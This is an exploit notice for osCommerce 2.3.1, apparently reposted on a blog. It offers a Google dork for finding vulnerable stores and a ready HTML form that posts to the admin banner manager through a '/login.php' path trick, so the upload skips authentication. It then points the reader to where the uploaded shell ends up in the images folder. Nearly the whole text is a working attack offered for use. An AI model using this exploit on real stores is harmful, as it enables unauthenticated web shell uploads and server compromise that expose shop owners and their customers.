# Exploit Title: [OSC 2.3.1: Remote File Upload Vulnerability : Banner Manager] |
# Google Dork: [powered by oscommerce] (we will automatically add these to the GHDB) |
# Date : [13-05-2011] |
# Author: [Number 7] |
# Software Link: [http: //www.oscommerce.com/ext/oscommerce-2.3.1.zip] |
# Version: [2.3.1] |
# Tested on: [Linux-apache-win03-mac Os .... ] |
# CVE : [ if exists] |
_______________________________________________________________________________________ |
<form name= "new_banner" action= "http://site/path/admin/banner_manager.php/login.php?action=insert" method= "post" enctype= "multipart/form-data" ><br> |
<input type= "file" name= "banners_image" ><br> |
<input name= "submit" value= " Save " type= "submit" ></form> |
you will find your shell in |
http: //site/path/images/yourshell.php |
No comments:
Post a Comment